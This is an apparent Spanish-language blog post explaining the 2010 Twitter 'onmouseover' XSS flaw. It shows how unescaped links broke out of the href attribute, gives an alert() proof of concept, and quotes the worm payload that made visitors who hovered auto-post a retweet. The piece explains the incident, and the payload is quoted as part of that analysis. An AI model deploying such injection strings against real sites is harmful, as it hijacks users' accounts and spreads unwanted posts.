Acerca del ataque XSS en Twitter


Publicado el: 24 de septiembre, 2010

Ataque XSS a Twitter

Esta semana Twitter sufrió un ataque XSS que afectó su cliente de web (no el #newtwitter). Como nos explican en su blog este problema ya fue parcheado el anterior mes pero al realizar una actualización a Twitter resurgió.

Basicamente el problema fue que el cliente de  Twitter no limpiaba el código que venía con las URLs. Cuando uno coloca un link (LINK) en un tweet el cliente de Twitter le da el siguiente formato:

<a href="LINK" class="tweet-url" rel="nofollow" target="_blank">LINK</a>

Pero digamos que envíamos esta URL vía Twitter

http://a.com"onmouseover="alert('Weee!')

Twitter colocará la url tal cual en el parámetro href:

<a href="http://a.com"onmouseover="alert('Weee!')"> http://a.com"onmouseover="alert('Weee!')</a>

Los browsers reconoceran el link como:

<a href="http://a.com" onmouseover="alert('Weee!')"> http://a.com"onmouseover="alert('Weee!')</a>

Obviamente con el control de onmouseover y Twitter utiliza jQuery, se pueden imaginar que cosas hicieron con:

http://t.co/@"onmouseover="document.getElementById('status').value='RT Matsta';$('.status-update-form').submit();"class="modal-overlay"/

Custom Solutions for your business

Experience, Quality and Security

Contact us